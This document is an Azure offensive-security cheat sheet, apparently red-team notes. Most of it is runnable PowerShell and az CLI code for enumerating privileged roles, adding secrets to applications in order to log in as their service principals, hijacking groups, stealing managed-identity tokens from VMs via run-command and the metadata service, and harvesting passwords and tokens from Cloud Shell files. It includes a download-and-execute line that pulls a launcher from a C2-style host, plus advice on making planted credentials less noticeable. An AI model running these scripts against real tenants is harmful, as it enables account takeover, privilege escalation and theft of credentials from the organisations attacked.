# AzureCli - PowerShell

{% embed url="https://learn.microsoft.com/en-us/cli/azure/reference-docs-index" %}

### Connect:

`Connect-AzureAD` (AzureAD module) is what the Recon and PrivEsc cmdlets below need; `Connect-AzAccount` (Az module) is used for the service-principal login and ARM work further down, and the `az` CLI has its own login (`az login`). Microsoft has deprecated the AzureAD module in favour of Microsoft Graph PowerShell: the cmdlets still work where the module is installed, but expect to translate them to their `Mg*` equivalents going forward.

```powershell
Connect-AzureAD
```

### Recon:

Get AD user:

```powershell
Get-AzureADUser
Get-AzureADUser | ?{$_.DisplayName -eq 'Administrator'}
```

Get AD directory role:

```powershell
Get-AzureADDirectoryRole
Get-AzureADDirectoryRole | ?{$_.DisplayName -eq 'Global Administrator'} | select DisplayName, ObjectId, RoleTemplateId
```

Get AD directory role member (pass the role's ObjectId from above, not its RoleTemplateId):

```powershell
Get-AzureADDirectoryRoleMember
Get-AzureADDirectoryRoleMember -ObjectId "17ddcf1d-d9af-4686-b229-4606e9f3d101"
```

Get AD group:

```powershell
Get-AzureADGroup
Get-AzureADGroup -ObjectId "ObjectID"
```

Get AD group member:

```powershell
Get-AzureADGroupMember -ObjectId d2b8110d-900f-4a37-92f0-b9c541ee4440
```

Get AD applications:

```powershell
Get-AzureADApplication
Get-AzureADApplication -ObjectId "17ddcf1d-d9af-4686-b229-4606e9f3d101"
```

Get AD application owner (owners can add credentials to the application, which is the basis of the privesc below):

```powershell
Get-AzureADApplicationOwner -ObjectId "74897263-fd31-48b8-8370-9fb8a847e9ef"
```
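The one-liners above answer single questions; what you usually want is the chain: which service principals hold a privileged directory role, which application sits behind each, and who owns that application (and can therefore add a secret to it). The following is an added example, not part of the original notes, that joins those cmdlets into one table. It assumes `Connect-AzureAD` has already succeeded; `$RolesOfInterest` is an assumption, widen it as needed.

```powershell
# Added example, not from the original notes: map privileged directory roles back to the
# service principals holding them, the applications behind those SPs, and the app owners.
# Assumes Connect-AzureAD has succeeded. $RolesOfInterest is an assumption.
$RolesOfInterest = @('Global Administrator', 'Privileged Role Administrator', 'Application Administrator')

# Get-AzureADDirectoryRole only lists roles that have been activated in the tenant at least once
$roles = Get-AzureADDirectoryRole | Where-Object { $RolesOfInterest -contains $_.DisplayName }

$results = foreach ($role in $roles) {
    foreach ($member in Get-AzureADDirectoryRoleMember -ObjectId $role.ObjectId) {
        $owners = @()
        if ($member.ObjectType -eq 'ServicePrincipal') {
            # The SP and its application share an AppId. The application object only exists in
            # this tenant for apps registered here, so third-party SPs come back with no owners.
            $app = Get-AzureADApplication -Filter "appId eq '$($member.AppId)'"
            if ($app) {
                $owners = Get-AzureADApplicationOwner -ObjectId $app.ObjectId |
                    ForEach-Object { if ($_.UserPrincipalName) { $_.UserPrincipalName } else { $_.DisplayName } }
            }
        }
        [pscustomobject]@{
            Role       = $role.DisplayName
            Member     = $member.DisplayName
            MemberType = $member.ObjectType   # User, Group or ServicePrincipal
            AppId      = $member.AppId        # null for users and groups
            AppOwners  = ($owners -join '; ')
        }
    }
}

$results | Sort-Object Role, MemberType | Format-Table -AutoSize

# Anyone in AppOwners is effectively the role their app's SP holds: add a secret, log in as the SP
$results | Where-Object { $_.AppOwners } | Select-Object Role, Member, AppOwners
```

Two caveats when reading the output: roles that were never activated do not appear at all (activate with `Enable-AzureADDirectoryRole` if you hold the rights), and group members of a role are not expanded here, so follow up with `Get-AzureADGroupMember` on any `Group` rows.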

## PrivEsc:

### Applications & Service Principal exploitation

Add application secret (requires ownership of the application or a role such as Application Administrator):

```powershell
# Add-AzureADSPSecret is a PowerZure cmdlet, not part of the AzureAD module;
# the native equivalent is New-AzureADApplicationPasswordCredential -ObjectId <app ObjectId>
Add-AzureADSPSecret -ApplicationName APPLICATION -Verbose
```

Authenticate as the service principal (the credential user name is the application's AppId / client ID, not its ObjectId; the IDs below are placeholders from the original notes):

```powershell
$ApplicationId = "2097243e-269f-47-8d-f9c62ecc8b5c"   # AppId of the application
$SecurePassword = "Z1Y~TjWzaZw"                         # secret added in the previous step
$SecurePassword = ConvertTo-SecureString -String $SecurePassword -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $ApplicationId, $SecurePassword
# -Tenant is the tenant ID; Connect-AzAccount succeeds even if the SP has no RBAC roles yet
Connect-AzAccount -Credential $Credential -Tenant b20fc61c-960d-4f40-bbbe-17ac412fe0c0 -ServicePrincipal
```
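The two steps above, done end to end with the native AzureAD cmdlet instead of PowerZure, as an added example that is not part of the original notes. It assumes `Connect-AzureAD` has succeeded as a principal that owns the target application, that Az.Accounts and Az.Resources are installed, and that `$AppDisplayName` names an application in this tenant; everything else is looked up.

```powershell
# Added example, not PowerZure and not the original notes: add a password credential to an
# application you own with the native AzureAD cmdlet, then authenticate as its SP with Az.
# Assumes Connect-AzureAD has succeeded and $AppDisplayName is an app in this tenant.
$AppDisplayName = 'APPLICATION'

$app = Get-AzureADApplication -Filter "displayName eq '$AppDisplayName'"
if (-not $app) { throw "application '$AppDisplayName' not found" }
$tenantId = (Get-AzureADTenantDetail).ObjectId

# Generate the secret locally so we never depend on the API echoing it back
$bytes = New-Object byte[] 32
(New-Object System.Security.Cryptography.RNGCryptoServiceProvider).GetBytes($bytes)
$secretValue = [Convert]::ToBase64String($bytes)

# Short lifetime and a bland key identifier: it shows up in the app's credential list
$cred = New-AzureADApplicationPasswordCredential -ObjectId $app.ObjectId `
            -CustomKeyIdentifier 'maint' `
            -StartDate (Get-Date) -EndDate (Get-Date).AddDays(7) `
            -Value $secretValue

# Log in as the service principal: user name is the AppId, password is the new secret
$secure = ConvertTo-SecureString -String $secretValue -AsPlainText -Force
$spCred = New-Object System.Management.Automation.PSCredential ($app.AppId, $secure)
Connect-AzAccount -ServicePrincipal -Credential $spCred -Tenant $tenantId

# What the SP can reach in the subscription(s) of the current context
Get-AzRoleAssignment -ServicePrincipalName $app.AppId | Select-Object RoleDefinitionName, Scope

# Keep $cred.KeyId: the credential is removed with
#   Remove-AzureADApplicationPasswordCredential -ObjectId $app.ObjectId -KeyId $cred.KeyId
```

The credential is written to the application object and appears in the portal and in the audit log immediately, so record `$cred.KeyId` and remove it when the engagement ends. Directory roles held by the SP (the Global Administrator case from the recon section) are used through `Connect-AzureAD` with the same AppId/secret, not through Az.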

#### AZAddMembers

Add a principal you control to a group (needs ownership of the group or a role that can manage group membership):

```powershell
Add-AzureADGroupMember -ObjectId GROUP-ID -RefObjectId USER-ID
```

#### AzureADGroupOwner

Make a principal you control an owner of the group (-ObjectId is the group, -RefObjectId the new owner; the repeated GUID below is a placeholder):

```powershell
Add-AzureADGroupOwner -ObjectId b20fc61c-960d-4f40-bbbe-17ac412fe0c0 -RefObjectId b20fc61c-960d-4f40-bbbe-17ac412fe0c0
```


### Virtual Machine:

List VMs and show whether each has a managed identity (`az vm identity show` prints nothing for VMs without one):

```powershell
(az vm list | ConvertFrom-Json) | ForEach-Object {$_.name;(az vm identity show --resource-group $_.resourceGroup --name $_.name | ConvertFrom-Json)}
```

Run command (needs `Microsoft.Compute/virtualMachines/runCommand/action`, e.g. Virtual Machine Contributor; `RunPowerShellScript` executes as SYSTEM on Windows, `RunShellScript` as root on Linux):

```powershell
# --name and -g values omitted in the original; --scripts @file reads the script from a local file
az vm run-command invoke --command-id RunPowerShellScript --name -g --scripts @join-domain-script.ps1 --parameters "user=admin" "password=secret-password"
az vm run-command invoke
az vm run-command invoke --command-id RunPowerShellScript --name CSETest -g TESTER --scripts "iex (New-Object Net.WebClient).DownloadString('https://c2.netspi.invalid/netspi/launcher.ps1')"
```

#### Privesc:

The VMs from the listing above that carry a managed identity are the targets: whatever you execute on them through run-command can ask the instance metadata service for a token for that identity, and every Azure RBAC role assigned to the identity is then usable from your own machine.

```powershell
# same listing as above: name followed by the identity block (type, principalId) where one exists
(az vm list | ConvertFrom-Json) | ForEach-Object {$_.name;(az vm identity show --resource-group $_.resourceGroup --name $_.name | ConvertFrom-Json)}
```
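The whole path, as an added example that is not part of the original notes: pick the VMs that have an identity straight from the `az vm list` output (the identity block is included there, so the extra `identity show` call is unnecessary), run a small script on one of them that requests an ARM token from the metadata endpoint, and use that token locally. It assumes the `az` CLI is logged in with run-command rights on the target, that the target is a Windows VM, and that `$TargetName` names one of the VMs listed; the metadata URL and response fields are those documented for IMDS.

```powershell
# Added example, not from the original notes: managed-identity token theft via run-command.
# Assumes az CLI is logged in with run-command rights and $TargetName is a Windows VM with an identity.
$TargetName = 'CSETest'

# az vm list already carries the identity block; no identity is $null
$withIdentity = foreach ($vm in (az vm list | ConvertFrom-Json)) {
    if ($vm.identity) {
        [pscustomobject]@{
            Name          = $vm.name
            ResourceGroup = $vm.resourceGroup
            Type          = $vm.identity.type          # SystemAssigned, UserAssigned, or both
            PrincipalId   = $vm.identity.principalId   # null when only user-assigned identities exist
        }
    }
}
$withIdentity | Format-Table -AutoSize

$target = $withIdentity | Where-Object Name -eq $TargetName
if (-not $target) { throw "no VM named '$TargetName' with a managed identity" }

# Script executed on the VM. IMDS is link-local, unauthenticated, and only needs the Metadata header.
# With several user-assigned identities, add &client_id=<id> to choose one. Single quotes keep $uri
# from expanding on our side.
$script = @'
$uri = 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https%3A%2F%2Fmanagement.azure.com%2F'
Invoke-RestMethod -Uri $uri -Headers @{ Metadata = 'true' } -Method GET | ConvertTo-Json -Compress
'@
$scriptPath = Join-Path $env:TEMP 'imds.ps1'
Set-Content -Path $scriptPath -Value $script

$out = az vm run-command invoke --command-id RunPowerShellScript `
           --resource-group $target.ResourceGroup --name $target.Name `
           --scripts "@$scriptPath" | ConvertFrom-Json

# run-command returns stdout as value[0].message and stderr as value[1].message
$token = $out.value[0].message | ConvertFrom-Json
if (-not $token.access_token) { throw "no token returned: $($out.value[1].message)" }

# Use the token from here; -AccountId must be the identity's client_id, which IMDS returns
Connect-AzAccount -AccessToken $token.access_token -AccountId $token.client_id
Get-AzRoleAssignment -ObjectId $token.client_id -ErrorAction SilentlyContinue |
    Select-Object RoleDefinitionName, Scope
Get-AzResource | Select-Object Name, ResourceType, ResourceGroupName
```

Two things to keep in mind: run-command is slow (it goes through a VM extension), and it is not quiet, since the invocation lands in the Activity Log and the script file is written to the VM's disk. The token is short-lived and scoped to ARM; request a different `resource` (for example `https://graph.microsoft.com/`) if the identity has Graph permissions instead. The `Get-AzRoleAssignment` lookup by `client_id` is a convenience that can come back empty; `$target.PrincipalId` is the authoritative object ID for a system-assigned identity.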

## Azure shell:

#### history enumeration:

Cloud Shell persists the user's home directory between sessions, and Az PowerShell writes a log for each failed cmdlet under `.Azure/ErrorRecords`. A failed `New-AzVM` can capture the bound parameters, including the admin password, so search those logs (bash in this case):

```bash
grep -b5 -a5 Password .Azure/ErrorRecords/New-AzVM_2019-10-18-T21-39-25-103.log
```
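The grep above targets one log; the same search generalised across the files a Cloud Shell (or any Az/az-equipped) profile leaves behind, as an added example that is not part of the original notes. Only `.Azure/ErrorRecords` is taken from the page; the other paths are assumptions about the usual layout of the Az PowerShell (`~/.Azure`), az CLI (`~/.azure`) and shell history files, and on Linux the two dot-directories are distinct because of case.

```powershell
# Added example, not from the original notes: search the profile for leaked secrets.
# .Azure/ErrorRecords comes from the page; the other paths are assumptions about typical layout.
$candidates = @(
    (Join-Path $HOME '.Azure/ErrorRecords/*.log'),   # Az PowerShell error records (bound parameters)
    (Join-Path $HOME '.Azure/AzureRmContext.json'),  # Az PowerShell saved contexts
    (Join-Path $HOME '.azure/azureProfile.json'),    # az CLI logged-in accounts
    (Join-Path $HOME '.azure/accessTokens.json'),    # older az CLI token store (assumption)
    (Join-Path $HOME '.bash_history'),
    (Join-Path $HOME '.local/share/powershell/PSReadLine/ConsoleHost_history.txt')
)

# Case-insensitive by default; ConvertTo-SecureString catches inline plaintext-to-credential lines
$pattern = 'password|secret|token|pwd|ConvertTo-SecureString'

$hits = Get-ChildItem -Path $candidates -File -ErrorAction SilentlyContinue |
    Select-String -Pattern $pattern -Context 2, 2

foreach ($hit in $hits) {
    "{0}:{1}: {2}" -f $hit.Path, $hit.LineNumber, $hit.Line.Trim()
    $hit.Context.PostContext | ForEach-Object { "    " + $_.Trim() }
}

# Summary per file, useful when the error-record directory is large
$hits | Group-Object Path | Select-Object Name, Count | Sort-Object Count -Descending
```

Treat the JSON files differently from the logs: they hold identities and tokens rather than passwords, so a single hit there is worth opening the whole file, while the error-record logs are large and usually need the context lines to make sense of a hit.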

